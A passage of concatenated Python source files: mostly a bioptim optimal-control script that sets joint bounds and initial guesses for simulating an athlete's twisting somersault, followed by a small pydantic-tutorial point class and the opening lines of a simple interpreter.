dynamics.add(DynamicsFcn.JOINTS_ACCELERATION_DRIVEN)
qddot_joints_min, qddot_joints_max, qddot_joints_init = -500, 500, 0
u_bounds = BoundsList()
for i in range(5):
u_bounds.add("qddot_joints", min_bound=[qddot_joints_min] * nb_qddot_joints, max_bound=[qddot_joints_max] * nb_qddot_joints, phase=i)
u_init = InitialGuessList()
for i in range(5):
u_init.add("qddot_joints", [qddot_joints_init] * nb_qddot_joints, phase=i)
u_init[i]["qddot_joints"].add_noise(
bounds=u_bounds[i]["qddot_joints"],
magnitude=0.2,
magnitude_type=MagnitudeType.RELATIVE,
n_shooting=n_shooting[i],
seed=seed,
)
# Path constraint
x_bounds = BoundsList()
for i in range(5):
x_bounds.add("q", min_bound=biorbd_model[0].bounds_from_ranges("q").min, max_bound=biorbd_model[0].bounds_from_ranges("q").max, phase=i)
x_bounds.add("qdot", min_bound=biorbd_model[0].bounds_from_ranges("qdot").min, max_bound=biorbd_model[0].bounds_from_ranges("qdot").max, phase=i)
# Pour la lisibilite
DEBUT, MILIEU, FIN = 0, 1, 2
#
# Contraintes de position: PHASE 0 la montee en carpe
#
zmax = 8
# 12 / 8 * final_time**2 + 1 # une petite marge
# deplacement
x_bounds[0]["q"].min[X, :] = -.1
x_bounds[0]["q"].max[X, :] = .1
x_bounds[0]["q"].min[Y, :] = -1.
x_bounds[0]["q"].max[Y, :] = 1.
x_bounds[0]["q"].min[:Z + 1, DEBUT] = 0
x_bounds[0]["q"].max[:Z + 1, DEBUT] = 0
x_bounds[0]["q"].min[Z, MILIEU:] = 0
x_bounds[0]["q"].max[Z, MILIEU:] = zmax # beaucoup plus que necessaire, juste pour que la parabole fonctionne
# le salto autour de x
x_bounds[0]["q"].min[Xrot, :] = 0
# 2 * 3.14 + 3 / 2 * 3.14 - .2
x_bounds[0]["q"].max[Xrot, :] = -.50 + 3.14
x_bounds[0]["q"].min[Xrot, DEBUT] = .50 # penche vers l'avant un peu carpe
x_bounds[0]["q"].max[Xrot, DEBUT] = .50
x_bounds[0]["q"].min[Xrot, MILIEU:] = 0
x_bounds[0]["q"].max[Xrot, MILIEU:] = 4 * 3.14 + .1 # salto
# limitation du tilt autour de y
x_bounds[0]["q"].min[Yrot, DEBUT] = 0
x_bounds[0]["q"].max[Yrot, DEBUT] = 0
x_bounds[0]["q"].min[Yrot, MILIEU:] = - 3.14 / 16 # vraiment pas suppose tilte
x_bounds[0]["q"].max[Yrot, MILIEU:] = 3.14 / 16
# la vrille autour de z
x_bounds[0]["q"].min[Zrot, DEBUT] = 0
x_bounds[0]["q"].max[Zrot, DEBUT] = 0
x_bounds[0]["q"].min[Zrot, MILIEU:] = -.1 # pas de vrille dans cette phase
x_bounds[0]["q"].max[Zrot, MILIEU:] = .1
# bras droit
x_bounds[0]["q"].min[YrotBD, DEBUT] = 2.9 # debut bras aux oreilles
x_bounds[0]["q"].max[YrotBD, DEBUT] = 2.9
x_bounds[0]["q"].min[ZrotBD, DEBUT] = 0
x_bounds[0]["q"].max[ZrotBD, DEBUT] = 0
# bras gauche
x_bounds[0]["q"].min[YrotBG, DEBUT] = -2.9 # debut bras aux oreilles
x_bounds[0]["q"].max[YrotBG, DEBUT] = -2.9
x_bounds[0]["q"].min[ZrotBG, DEBUT] = 0
x_bounds[0]["q"].max[ZrotBG, DEBUT] = 0
# coude droit
x_bounds[0]["q"].min[ZrotABD:XrotABD + 1, DEBUT] = 0
x_bounds[0]["q"].max[ZrotABD:XrotABD + 1, DEBUT] = 0
# coude gauche
x_bounds[0]["q"].min[ZrotABG:XrotABG + 1, DEBUT] = 0
x_bounds[0]["q"].max[ZrotABG:XrotABG + 1, DEBUT] = 0
# le carpe
x_bounds[0]["q"].min[XrotC, DEBUT] = -.50 # depart un peu ferme aux hanches
x_bounds[0]["q"].max[XrotC, DEBUT] = -.50
x_bounds[0]["q"].max[XrotC, FIN] = -2.5
# x_bounds[0].min[XrotC, FIN] = 2.7 # min du modele
# le dehanchement
x_bounds[0]["q"].min[YrotC, DEBUT] = 0
x_bounds[0]["q"].max[YrotC, DEBUT] = 0
x_bounds[0]["q"].min[YrotC, MILIEU:] = -.1
x_bounds[0]["q"].max[YrotC, MILIEU:] = .1
# Contraintes de vitesse: PHASE 0 la montee en carpe
vzinit = 9.81 / (2 * final_time ) # vitesse initiale en z du CoM pour revenir a terre au temps final
# decalage entre le bassin et le CoM
CoM_Q_sym = MX.sym('CoM', nb_q)
CoM_Q_init = x_bounds[0]["q"].min[:nb_q,
DEBUT] # min ou max ne change rien a priori, au DEBUT ils sont egaux normalement
CoM_Q_func = Function('CoM_Q_func', [CoM_Q_sym], [biorbd_model[0].center_of_mass(CoM_Q_sym)])
bassin_Q_func = Function('bassin_Q_func', [CoM_Q_sym],
[biorbd_model[0].homogeneous_matrices_in_global(CoM_Q_sym, 0).to_mx()]) # retourne la RT du bassin
r = np.array(CoM_Q_func(CoM_Q_init)).reshape(1, 3) - np.array(bassin_Q_func(CoM_Q_init))[-1,
:3] # selectionne seulement la translation de la RT
# en xy bassin
x_bounds[0]["qdot"].min[vX:vY + 1, :] = -10
x_bounds[0]["qdot"].max[vX:vY + 1, :] = 10
x_bounds[0]["qdot"].min[vX:vY + 1, DEBUT] = -.5
x_bounds[0]["qdot"].max[vX:vY + 1, DEBUT] = .5
# z bassin
x_bounds[0]["qdot"].min[vZ, :] = -50
x_bounds[0]["qdot"].max[vZ, :] = 50
x_bounds[0]["qdot"].min[vZ, DEBUT] = vzinit - .5
x_bounds[0]["qdot"].max[vZ, DEBUT] = vzinit + .5
# autour de x
x_bounds[0]["qdot"].min[vXrot, :] = .5 # d'apres une observation video
x_bounds[0]["qdot"].max[vXrot, :] = 20 # aussi vite que nécessaire, mais ne devrait pas atteindre cette vitesse
# autour de y
x_bounds[0]["qdot"].min[vYrot, :] = -50
x_bounds[0]["qdot"].max[vYrot, :] = 50
x_bounds[0]["qdot"].min[vYrot, DEBUT] = 0
x_bounds[0]["qdot"].max[vYrot, DEBUT] = 0
# autour de z
x_bounds[0]["qdot"].min[vZrot, :] = -50
x_bounds[0]["qdot"].max[vZrot, :] = 50
x_bounds[0]["qdot"].min[vZrot, DEBUT] = 0
x_bounds[0]["qdot"].max[vZrot, DEBUT] = 0
# tenir compte du decalage entre bassin et CoM avec la rotation
# Qtransdot = Qtransdot + v cross Qrotdot
borne_inf = (x_bounds[0]["qdot"].min[vX:vZ + 1, DEBUT] + np.cross(r, x_bounds[0]["qdot"].min[vXrot:vZrot + 1, DEBUT]))[0]
borne_sup = (x_bounds[0]["qdot"].max[vX:vZ + 1, DEBUT] + np.cross(r, x_bounds[0]["qdot"].max[vXrot:vZrot + 1, DEBUT]))[0]
x_bounds[0]["qdot"].min[vX:vZ + 1, DEBUT] = min(borne_sup[0], borne_inf[0]), min(borne_sup[1], borne_inf[1]), min(
borne_sup[2], borne_inf[2])
x_bounds[0]["qdot"].max[vX:vZ + 1, DEBUT] = max(borne_sup[0], borne_inf[0]), max(borne_sup[1], borne_inf[1]), max(
borne_sup[2], borne_inf[2])
# bras droit
x_bounds[0]["qdot"].min[vZrotBD:vYrotBD + 1, :] = -50
x_bounds[0]["qdot"].max[vZrotBD:vYrotBD + 1, :] = 50
x_bounds[0]["qdot"].min[vZrotBD:vYrotBD + 1, DEBUT] = 0
x_bounds[0]["qdot"].max[vZrotBD:vYrotBD + 1, DEBUT] = 0
# bras droit
x_bounds[0]["qdot"].min[vZrotBG:vYrotBG + 1, :] = -50
x_bounds[0]["qdot"].max[vZrotBG:vYrotBG + 1, :] = 50
x_bounds[0]["qdot"].min[vZrotBG:vYrotBG + 1, DEBUT] = 0
x_bounds[0]["qdot"].max[vZrotBG:vYrotBG + 1, DEBUT] = 0
# coude droit
x_bounds[0]["qdot"].min[vZrotABD:vYrotABD + 1, :] = -50
x_bounds[0]["qdot"].max[vZrotABD:vYrotABD + 1, :] = 50
x_bounds[0]["qdot"].min[vZrotABD:vYrotABD + 1, DEBUT] = 0
x_bounds[0]["qdot"].max[vZrotABD:vYrotABD + 1, DEBUT] = 0
# coude gauche
x_bounds[0]["qdot"].min[vZrotABD:vYrotABG + 1, :] = -50
x_bounds[0]["qdot"].max[vZrotABD:vYrotABG + 1, :] = 50
x_bounds[0]["qdot"].min[vZrotABG:vYrotABG + 1, DEBUT] = 0
x_bounds[0]["qdot"].max[vZrotABG:vYrotABG + 1, DEBUT] = 0
# du carpe
x_bounds[0]["qdot"].min[vXrotC, :] = -50
x_bounds[0]["qdot"].max[vXrotC, :] = 50
x_bounds[0]["qdot"].min[vXrotC, DEBUT] = 0
x_bounds[0]["qdot"].max[vXrotC, DEBUT] = 0
# du dehanchement
x_bounds[0]["qdot"].min[vYrotC, :] = -50
x_bounds[0]["qdot"].max[vYrotC, :] = 50
x_bounds[0]["qdot"].min[vYrotC, DEBUT] = 0
x_bounds[0]["qdot"].max[vYrotC, DEBUT] = 0
#
# Contraintes de position: PHASE 1 le salto carpe
#
# deplacement
x_bounds[1]["q"].min[X, :] = -.1
x_bounds[1]["q"].max[X, :] = .1
x_bounds[1]["q"].min[Y, :] = -1.
x_bounds[1]["q"].max[Y, :] = 1.
x_bounds[1]["q"].min[Z, :] = 0
x_bounds[1]["q"].max[Z, :] = zmax # beaucoup plus que necessaire, juste pour que la parabole fonctionne
# le salto autour de x
x_bounds[1]["q"].min[Xrot, :] = 0
x_bounds[1]["q"].max[Xrot, :] = -.50 + 4 * 3.14
x_bounds[1]["q"].min[Xrot, FIN] = 2 * 3.14 - .1
# limitation du tilt autour de y
x_bounds[1]["q"].min[Yrot, :] = - 3.14 / 16
x_bounds[1]["q"].max[Yrot, :] = 3.14 / 16
# la vrille autour de z
x_bounds[1]["q"].min[Zrot, :] = -.1
x_bounds[1]["q"].max[Zrot, :] = .1
# le carpe
x_bounds[1]["q"].max[XrotC, :] = -2.5
# le dehanchement
x_bounds[1]["q"].min[YrotC, DEBUT] = -.1
x_bounds[1]["q"].max[YrotC, DEBUT] = .1
# Contraintes de vitesse: PHASE 1 le salto carpe
# en xy bassin
x_bounds[1]["qdot"].min[vX:vY + 1, :] = -10
x_bounds[1]["qdot"].max[vX:vY + 1, :] = 10
# z bassin
x_bounds[1]["qdot"].min[vZ, :] = -50
x_bounds[1]["qdot"].max[vZ, :] = 50
# autour de x
x_bounds[1]["qdot"].min[vXrot, :] = -50
x_bounds[1]["qdot"].max[vXrot, :] = 50
# autour de y
x_bounds[1]["qdot"].min[vYrot, :] = -50
x_bounds[1]["qdot"].max[vYrot, :] = 50
# autour de z
x_bounds[1]["qdot"].min[vZrot, :] = -50
x_bounds[1]["qdot"].max[vZrot, :] = 50
# bras droit
x_bounds[1]["qdot"].min[vZrotBD:vYrotBD + 1, :] = -50
x_bounds[1]["qdot"].max[vZrotBD:vYrotBD + 1, :] = 50
# bras droit
x_bounds[1]["qdot"].min[vZrotBG:vYrotBG + 1, :] = -50
x_bounds[1]["qdot"].max[vZrotBG:vYrotBG + 1, :] = 50
# coude droit
x_bounds[1]["qdot"].min[vZrotABD:vYrotABD + 1, :] = -50
x_bounds[1]["qdot"].max[vZrotABD:vYrotABD + 1, :] = 50
# coude gauche
x_bounds[1]["qdot"].min[vZrotABD:vYrotABG + 1, :] = -50
x_bounds[1]["qdot"].max[vZrotABD:vYrotABG + 1, :] = 50
# du carpe
x_bounds[1]["qdot"].min[vXrotC, :] = -50
x_bounds[1]["qdot"].max[vXrotC, :] = 50
# du dehanchement
x_bounds[1]["qdot"].min[vYrotC, :] = -50
x_bounds[1]["qdot"].max[vYrotC, :] = 50
#
# Contraintes de position: PHASE 2 l'ouverture
#
# deplacement
x_bounds[2]["q"].min[X, :] = -.2
x_bounds[2]["q"].max[X, :] = .2
x_bounds[2]["q"].min[Y, :] = -1.
x_bounds[2]["q"].max[Y, :] = 1.
x_bounds[2]["q"].min[Z, :] = 0
x_bounds[2]["q"].max[Z, :] = zmax # beaucoup plus que necessaire, juste pour que la parabole fonctionne
# le salto autour de x
x_bounds[2]["q"].min[Xrot, :] = 2 * 3.14 - .1
x_bounds[2]["q"].max[Xrot, :] = -.50 + 4 * 3.14
# limitation du tilt autour de y
x_bounds[2]["q"].min[Yrot, :] = - 3.14 / 4
x_bounds[2]["q"].max[Yrot, :] = 3.14 / 4
# la vrille autour de z
x_bounds[2]["q"].min[Zrot, :] = 0
x_bounds[2]["q"].max[Zrot, :] = 3.14 # 5 * 3.14
x_bounds[2]["q"].min[XrotC, FIN] = -.4
# Contraintes de vitesse: PHASE 2 l'ouverture
# en xy bassin
x_bounds[2]["qdot"].min[vX:vY + 1, :] = -10
x_bounds[2]["qdot"].max[vX:vY + 1, :] = 10
# z bassin
x_bounds[2]["qdot"].min[vZ, :] = -50
x_bounds[2]["qdot"].max[vZ, :] = 50
# autour de x
x_bounds[2]["qdot"].min[vXrot, :] = -50
x_bounds[2]["qdot"].max[vXrot, :] = 50
# autour de y
x_bounds[2]["qdot"].min[vYrot, :] = -50
x_bounds[2]["qdot"].max[vYrot, :] = 50
# autour de z
x_bounds[2]["qdot"].min[vZrot, :] = -50
x_bounds[2]["qdot"].max[vZrot, :] = 50
# bras droit
x_bounds[2]["qdot"].min[vZrotBD:vYrotBD + 1, :] = -50
x_bounds[2]["qdot"].max[vZrotBD:vYrotBD + 1, :] = 50
# bras droit
x_bounds[2]["qdot"].min[vZrotBG:vYrotBG + 1, :] = -50
x_bounds[2]["qdot"].max[vZrotBG:vYrotBG + 1, :] = 50
# coude droit
x_bounds[2]["qdot"].min[vZrotABD:vYrotABD + 1, :] = -50
x_bounds[2]["qdot"].max[vZrotABD:vYrotABD + 1, :] = 50
# coude gauche
x_bounds[2]["qdot"].min[vZrotABD:vYrotABG + 1, :] = -50
x_bounds[2]["qdot"].max[vZrotABD:vYrotABG + 1, :] = 50
# du carpe
x_bounds[2]["qdot"].min[vXrotC, :] = -50
x_bounds[2]["qdot"].max[vXrotC, :] = 50
# du dehanchement
x_bounds[2]["qdot"].min[vYrotC, :] = -50
x_bounds[2]["qdot"].max[vYrotC, :] = 50
#
# Contraintes de position: PHASE 3 la vrille et demie
#
# deplacement
x_bounds[3]["q"].min[X, :] = -.2
x_bounds[3]["q"].max[X, :] = .2
x_bounds[3]["q"].min[Y, :] = -1.
x_bounds[3]["q"].max[Y, :] = 1.
x_bounds[3]["q"].min[Z, :] = 0
x_bounds[3]["q"].max[Z, :] = zmax # beaucoup plus que necessaire, juste pour que la parabole fonctionne
# le salto autour de x
x_bounds[3]["q"].min[Xrot, :] = 0
x_bounds[3]["q"].min[Xrot, :] = 2 * 3.14 - .1
x_bounds[3]["q"].max[Xrot, :] = 2 * 3.14 + 3 / 2 * 3.14 + .1 # 1 salto 3/4
x_bounds[3]["q"].min[Xrot, FIN] = 2 * 3.14 + 3 / 2 * 3.14 - .1
x_bounds[3]["q"].max[Xrot, FIN] = 2 * 3.14 + 3 / 2 * 3.14 + .1 # 1 salto 3/4
# limitation du tilt autour de y
x_bounds[3]["q"].min[Yrot, :] = - 3.14 / 4
x_bounds[3]["q"].max[Yrot, :] = 3.14 / 4
x_bounds[3]["q"].min[Yrot, FIN] = - 3.14 / 8
x_bounds[3]["q"].max[Yrot, FIN] = 3.14 / 8
# la vrille autour de z
x_bounds[3]["q"].min[Zrot, :] = 0
x_bounds[3]["q"].max[Zrot, :] = 5 * 3.14
x_bounds[3]["q"].min[Zrot, FIN] = nb_twist * 3.14 - .1 # complete la vrille
x_bounds[3]["q"].max[Zrot, FIN] = nb_twist * 3.14 + .1
# le carpe f4a les jambes
x_bounds[3]["q"].min[XrotC, :] = -.4
# le dehanchement
# Contraintes de vitesse: PHASE 3 la vrille et demie
# en xy bassin
x_bounds[3]["qdot"].min[vX:vY + 1, :] = -10
x_bounds[3]["qdot"].max[vX:vY + 1, :] = 10
# z bassin
x_bounds[3]["qdot"].min[vZ, :] = -50
x_bounds[3]["qdot"].max[vZ, :] = 50
# autour de x
x_bounds[3]["qdot"].min[vXrot, :] = -50
x_bounds[3]["qdot"].max[vXrot, :] = 50
# autour de y
x_bounds[3]["qdot"].min[vYrot, :] = -50
x_bounds[3]["qdot"].max[vYrot, :] = 50
# autour de z
x_bounds[3]["qdot"].min[vZrot, :] = -50
x_bounds[3]["qdot"].max[vZrot, :] = 50
# bras droit
x_bounds[3]["qdot"].min[vZrotBD:vYrotBD + 1, :] = -50
x_bounds[3]["qdot"].max[vZrotBD:vYrotBD + 1, :] = 50
# bras droit
x_bounds[3]["qdot"].min[vZrotBG:vYrotBG + 1, :] = -50
x_bounds[3]["qdot"].max[vZrotBG:vYrotBG + 1, :] = 50
# coude droit
x_bounds[3]["qdot"].min[vZrotABD:vYrotABD + 1, :] = -50
x_bounds[3]["qdot"].max[vZrotABD:vYrotABD + 1, :] = 50
# coude gauche
x_bounds[3]["qdot"].min[vZrotABD:vYrotABG + 1, :] = -50
x_bounds[3]["qdot"].max[vZrotABD:vYrotABG + 1, :] = 50
# du carpe
x_bounds[3]["qdot"].min[vXrotC, :] = -50
x_bounds[3]["qdot"].max[vXrotC, :] = 50
# du dehanchement
x_bounds[3]["qdot"].min[vYrotC, :] = -50
x_bounds[3]["qdot"].max[vYrotC, :] = 50
#
# Contraintes de position: PHASE 4 la reception
#
# deplacement
x_bounds[4]["q"].min[X, :] = -.1
x_bounds[4]["q"].max[X, :] = .1
x_bounds[4]["q"].min[Y, FIN] = -.1
x_bounds[4]["q"].max[Y, FIN] = .1
x_bounds[4]["q"].min[Z, :] = 0
x_bounds[4]["q"].max[Z, :] = zmax # beaucoup plus que necessaire, juste pour que la parabole fonctionne
x_bounds[4]["q"].min[Z, FIN] = 0
x_bounds[4]["q"].max[Z, FIN] = .1
# le salto autour de x
x_bounds[4]["q"].min[Xrot, :] = 2 * 3.14 + 3 / 2 * 3.14 - .2 # penche vers avant -> moins de salto
x_bounds[4]["q"].max[Xrot, :] = -.50 + 4 * 3.14 # un peu carpe a la fin
x_bounds[4]["q"].min[Xrot, FIN] = -.50 + 4 * 3.14 - .1 # salto fin un peu carpe
x_bounds[4]["q"].max[Xrot, FIN] = -.50 + 4 * 3.14 + .1 # salto fin un peu carpe
# limitation du tilt autour de y
x_bounds[4]["q"].min[Yrot, :] = - 3.14 / 16
x_bounds[4]["q"].max[Yrot, :] = 3.14 / 16
# la vrille autour de z
x_bounds[4]["q"].min[Zrot, :] = nb_twist * 3.14 - .1 # complete la vrille
x_bounds[4]["q"].max[Zrot, :] = nb_twist * 3.14 + .1
# bras droit
x_bounds[4]["q"].min[YrotBD, FIN] = 2.9 - .1 # debut bras aux oreilles
x_bounds[4]["q"].max[YrotBD, FIN] = 2.9 + .1
x_bounds[4]["q"].min[ZrotBD, FIN] = -.1
x_bounds[4]["q"].max[ZrotBD, FIN] = .1
# bras gauche
x_bounds[4]["q"].min[YrotBG, FIN] = -2.9 - .1 # debut bras aux oreilles
x_bounds[4]["q"].max[YrotBG, FIN] = -2.9 + .1
x_bounds[4]["q"].min[ZrotBG, FIN] = -.1
x_bounds[4]["q"].max[ZrotBG, FIN] = .1
# coude droit
x_bounds[4]["q"].min[ZrotABD:XrotABD + 1, FIN] = -.1
x_bounds[4]["q"].max[ZrotABD:XrotABD + 1, FIN] = .1
# coude gauche
x_bounds[4]["q"].min[ZrotABG:XrotABG + 1, FIN] = -.1
x_bounds[4]["q"].max[ZrotABG:XrotABG + 1, FIN] = .1
# le carpe
x_bounds[4]["q"].min[XrotC, :] = -.4
x_bounds[4]["q"].min[XrotC, FIN] = -.60
x_bounds[4]["q"].max[XrotC, FIN] = -.40 # fin un peu carpe
# le dehanchement
x_bounds[4]["q"].min[YrotC, FIN] = -.1
x_bounds[4]["q"].max[YrotC, FIN] = .1
# Contraintes de vitesse: PHASE 4 la reception
# en xy bassin
x_bounds[4]["qdot"].min[vX:vY + 1, :] = -10
x_bounds[4]["qdot"].max[vX:vY + 1, :] = 10
# z bassin
x_bounds[4]["qdot"].min[vZ, :] = -50
x_bounds[4]["qdot"].max[vZ, :] = 50
# autour de x
x_bounds[4]["qdot"].min[vXrot, :] = -50
x_bounds[4]["qdot"].max[vXrot, :] = 50
# autour de y
x_bounds[4]["qdot"].min[vYrot, :] = -50
x_bounds[4]["qdot"].max[vYrot, :] = 50
# autour de z
x_bounds[4]["qdot"].min[vZrot, :] = -50
x_bounds[4]["qdot"].max[vZrot, :] = 50
# bras droit
x_bounds[4]["qdot"].min[vZrotBD:vYrotBD + 1, :] = -50
x_bounds[4]["qdot"].max[vZrotBD:vYrotBD + 1, :] = 50
# bras droit
x_bounds[4]["qdot"].min[vZrotBG:vYrotBG + 1, :] = -50
x_bounds[4]["qdot"].max[vZrotBG:vYrotBG + 1, :] = 50
# coude droit
x_bounds[4]["qdot"].min[vZrotABD:vYrotABD + 1, :] = -50
x_bounds[4]["qdot"].max[vZrotABD:vYrotABD + 1, :] = 50
# coude gauche
x_bounds[4]["qdot"].min[vZrotABD:vYrotABG + 1, :] = -50
x_bounds[4]["qdot"].max[vZrotABD:vYrotABG + 1, :] = 50
# du carpe
x_bounds[4]["qdot"].min[vXrotC, :] = -50
x_bounds[4]["qdot"].max[vXrotC, :] = 50
# du dehanchement
x_bounds[4]["qdot"].min[vYrotC, :] = -50
x_bounds[4]["qdot"].max[vYrotC, :] = 50
#
# Initial guesses
#
x0 = np.vstack((np.zeros((nb_q, 2)), np.zeros((nb_qdot, 2))))
x1 = np.vstack((np.zeros((nb_q, 2)), np.zeros((nb_qdot, 2))))
x2 = np.vstack((np.zeros((nb_q, 2)), np.zeros((nb_qdot, 2))))
x3 = np.vstack((np.zeros((nb_q, 2)), np.zeros((nb_qdot, 2))))
x4 = np.vstack((np.zeros((nb_q, 2)), np.zeros((nb_qdot, 2))))
# bras droit f4a la vrille
# décollage prise del aposition carpée
x0[Xrot, 0] = .50
x0[ZrotBG] = -.75
x0[ZrotBD] = .75
x0[YrotBG, 0] = -2.9
x0[YrotBD, 0] = 2.9
x0[YrotBG, 1] = -1.35
x0[YrotBD, 1] = 1.35
x0[XrotC, 0] = -.5
x0[XrotC, 1] = -2.6
# rotater en salto (x) en carpé
x1[ZrotBG] = -.75
x1[ZrotBD] = .75
x1[Xrot, 1] = 2 * 3.14
x1[YrotBG] = -1.35
x1[YrotBD] = 1.35
x1[XrotC] = -2.6
# ouverture des hanches
x2[Xrot] = 2 * 3.14
x2[Zrot, 1] = 0.2
x2[ZrotBG, 0] = -.75
x2[ZrotBD, 0] = .75
x2[YrotBG, 0] = -1.35
x2[YrotBD, 0] = 1.35
x2[XrotC, 0] = -2.6
# Vrille en position tendue
x3[Xrot, 0] = 2 * 3.14
x3[Xrot, 1] = 2 * 3.14 + 3 / 2 * 3.14
x3[Zrot, 0] = 0 # METTRE 0 ?
x3[Zrot, 1] = nb_twist * 3.14
# Aterrissage (réduire le tilt)
x4[Xrot, 0] = 2 * 3.14 + 3 / 2 * 3.14
x4[Xrot, 1] = 4 * 3.14
x4[Zrot] = nb_twist * 3.14
x4[XrotC, 1] = -.5
x_init = InitialGuessList()
x_init.add("q", initial_guess=x0[:nb_q, :], interpolation=InterpolationType.LINEAR, phase=0)
x_init.add("qdot", initial_guess=x0[nb_q:, :], interpolation=InterpolationType.LINEAR, phase=0)
x_init.add("q", initial_guess=x1[:nb_q, :], interpolation=InterpolationType.LINEAR, phase=1)
x_init.add("qdot", initial_guess=x1[nb_q:, :], interpolation=InterpolationType.LINEAR, phase=1)
x_init.add("q", initial_guess=x2[:nb_q, :], interpolation=InterpolationType.LINEAR, phase=2)
x_init.add("qdot", initial_guess=x2[nb_q:, :], interpolation=InterpolationType.LINEAR, phase=2)
x_init.add("q", initial_guess=x3[:nb_q, :], interpolation=InterpolationType.LINEAR, phase=3)
x_init.add("qdot", initial_guess=x3[nb_q:, :], interpolation=InterpolationType.LINEAR, phase=3)
x_init.add("q", initial_guess=x4[:nb_q, :], interpolation=InterpolationType.LINEAR, phase=4)
x_init.add("qdot", initial_guess=x4[nb_q:, :], interpolation=InterpolationType.LINEAR, phase=4)
for i in range(5):
x_init[i]["q"].add_noise(
bounds=x_bounds[i]["q"],
n_shooting=np.array(n_shooting[i])+1,
magnitude=0.2,
magnitude_type=MagnitudeType.RELATIVE,
seed=seed,
)
x_init[i]["qdot"].add_noise(
bounds=x_bounds[i]["qdot"],
n_shooting=np.array(n_shooting[i])+1,
magnitude=0.2,
magnitude_type=MagnitudeType.RELATIVE,
seed=seed,
)
constraints = ConstraintList()
constraints.add(ConstraintFcn.SUPERIMPOSE_MARKERS, node=Node.ALL_SHOOTING, min_bound=-.1, max_bound=.1,
first_marker='MidMainG', second_marker='CibleMainG', phase=1)
constraints.add(ConstraintFcn.SUPERIMPOSE_MARKERS, node=Node.ALL_SHOOTING, min_bound=-.1, max_bound=.1,
first_marker='MidMainD', second_marker='CibleMainD', phase=1)
constraints.add(ConstraintFcn.TIME_CONSTRAINT, node=Node.END, min_bound=1e-4, max_bound=1.5, phase=1)
constraints.add(ConstraintFcn.TIME_CONSTRAINT, node=Node.END, min_bound=1e-4, max_bound=0.7, phase=3)
constraints.add(ConstraintFcn.TIME_CONSTRAINT, node=Node.END, min_bound=1e-4, max_bound=0.5, phase=4)
return OptimalControlProgram(
biorbd_model,
dynamics,
n_shooting,
[final_time / len(biorbd_model)] * len(biorbd_model),
x_init=x_init,
u_init=u_init,
x_bounds=x_bounds,
u_bounds=u_bounds,
objective_functions=objective_functions,
constraints=constraints,
n_threads=5,
)
def construct_filepath(biorbd_model_path, nb_twist, seed):
stunts = dict({3: "vrille_et_demi", 5: "double_vrille_et_demi", 7: "triple_vrille_et_demi"})
stunt = stunts[nb_twist]
athlete = biorbd_model_path.split('/')[-1].removesuffix('.bioMod')
title_before_solve = f"{athlete}_{stunt}_{seed}"
return title_before_solve
def save_results(sol: Solution,
*combinatorial_parameters,
**extra_parameter):
"""
Solving the ocp
Parameters
----------
sol: Solution
The solution to the ocp at the current pool
"""
title_before_solve = construct_filepath(biorbd_model_path, nb_twist, seed)
convergence = sol.status
dict_state = {}
q = []
qdot = []
tau = []
for i in range(len(sol.states)) :
q.append(sol.states[i]['q'])
qdot.append(sol.states[i]['qdot'])
tau.append(sol.controls[i]['qddot_joints'])
dict_state['q'] = q
dict_state['qdot'] = qdot
dict_state['tau'] = tau
del sol.ocp
dict_state['sol'] = sol
if convergence == 0 :
convergence = 'CVG'
print(f'{athlete} doing' + f' {stunt}' + ' converge')
else:
convergence = 'DVG'
print(f'{athlete} doing ' + f'{stunt}' + ' doesn t converge')
if save_folder:
with open(f'{save_folder}/{title_before_solve}_{convergence}.pkl', "wb") as file:
pickle.dump(dict_state, file)
else:
raise RuntimeError(f"This folder {save_folder} does not exist")
def should_solve(*combinatorial_parameters, **extra_parameters):
"""
Check if the filename already appears in the folder where files are saved, if not ocp must be solved
"""
biorbd_model_path, nb_twist, seed = combinatorial_parameters
save_folder = extra_parameters["save_folder"]
file_path = construct_filepath(biorbd_model_path, nb_twist, seed)
already_done_filenames = os.listdir(f"{save_folder}")
if file_path not in already_done_filenames:
return True
else:
return False
def prepare_multi_start(
combinatorial_parameters: dict[tuple,...],
save_folder: str = None,
n_pools: int = 6
) -> MultiStart:
"""
The initialization of the multi-start
"""
return MultiStart(
combinatorial_parameters=combinatorial_parameters,
prepare_ocp_callback=prepare_ocp,
post_optimization_callback=(save_results, {'save_folder': save_folder}),
should_solve_callback=(should_solve, {'save_folder': save_folder}),
solver=Solver.IPOPT(show_online_optim=False), # You cannot use show_online_optim with multi-start
n_pools=n_pools,
)
def main():
"""
Prepares and solves an ocp for a 803<. Animates the results
"""
seed = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
nb_twist = [3, 5]
athletes = [
# "AdCh",
# "AlAd",
# "AuJo",
# "Benjamin",
# "ElMe",
# "EvZl",
# "FeBl",
# "JeCh",
# "KaFu",
# "KaMi",
# "LaDe",
# "MaCu",
# "MaJa",
# "OlGa",
"Sarah",
# "SoMe",
# "WeEm",
# "ZoTs"
]
all_paths = []
for athlete in athletes :
path = f'{athlete}'+'.bioMod'
biorbd_model_path = "Models/Models_Lisa/" + f'{path}'
all_paths.append(biorbd_model_path)
combinatorial_parameters = {'bio_model_path': all_paths,
'nb_twist': nb_twist,
'seed': seed}
save_folder = "Multistart_double_vrille"
multi_start = prepare_multi_start(combinatorial_parameters=combinatorial_parameters, save_folder=save_folder, n_pools=6)
multi_start.solver = Solver.IPOPT(show_online_optim=False, show_options=dict(show_bounds=False))
#if Mod.with_hsl:
multi_start.solver.set_linear_solver('ma57')
#else:
# print("Not using ma57")
multi_start.solver.set_maximum_iterations(3000)
multi_start.solver.set_convergence_tolerance(1e-4)
#multi_start.solver.set_print_level(0)
multi_start.solve()
#sol.graphs(show_bounds=True, show_now=False, save_path=f'{folder}/{athlete}')
if __name__ == "__main__":
main()
| EveCharbie/AnthropoImpactOnTech | Tech_opt_MultiStart.py | Tech_opt_MultiStart.py | py | 34,211 | python | en | code | 1 | github-code | 36 |
5081502268 | class PointV2:
"""Representation of a two-dimensional point coordinate."""
def __init__(self, x: float, y: float) -> None:
"""Initializes a PointV2 with the given coordinates."""
self.x = x
self.y = y
def distance_to(self, other: "PointV2") -> float:
"""Computes the distance to another `PointV2`."""
dx = self.x - other.x
dy = self.y - other.y
return (dx**2 + dy**2) ** 0.5
p1 = PointV2(x="5", y="7")
p2 = PointV2(x=5, y=7)
| adonath/scipy-2023-pydantic-tutorial | notebooks/my-script.py | my-script.py | py | 497 | python | en | code | 10 | github-code | 36 |
12010296738 | #! /usr/bin/env python
import sys
import os
# A few module-level variables, because closures are an easy way to share
# state.
#
# Would be more modular to pass this to each of them. Oh well.
program = None
debug = False
instruction_index = 0
def get_param_value(param):
